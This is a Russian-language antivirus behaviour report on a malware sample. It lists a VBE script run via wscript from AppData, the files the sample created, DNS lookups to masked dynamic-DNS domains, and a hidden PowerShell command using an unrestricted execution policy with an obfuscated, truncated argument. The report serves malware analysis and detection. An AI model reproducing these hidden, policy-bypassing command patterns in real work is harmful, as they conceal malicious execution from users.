Техническая информация
Вредоносные функции
Создает и запускает на исполнение (эксплоит)
- '<SYSTEM32>\wscript.exe' "%APPDATA%\avg.vbe"
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\application data\microsoft\forms\refedit.exd
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %APPDATA%\avg.vbe
Сетевая активность
TCP
Запросы HTTP GET
- http://oc##.thawte.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD%2Fyl6nWPkczAQUe1tFz6%2FOy3r9MZIaarbzRutXSFACEEeXTXhzpbyrDS%2BzcBkvzl4%3D
UDP
- DNS ASK b.###4top.io
- DNS ASK bo####g.ddns.com.br
- DNS ASK oc##.thawte.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -ExecutionPolicy UnRestricted -Windo 1 -windowstyle hidden -noprofile -Command "$KXFMWIOSfFFAQsFZnaHnUhSiJJRrUeDsfHHJSSZrzufsJcoORIweuJREftcoQzXacknkOVhBa = (get-itemproperty -path ...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -ExecutionPolicy UnRestricted -Windo 1 -windowstyle hidden -noprofile -Command "$KXFMWIOSfFFAQsFZnaHnUhSiJJRrUeDsfHHJSSZrzufsJcoORIweuJREftcoQzXacknkOVhBa = (get-itemproperty -path ...
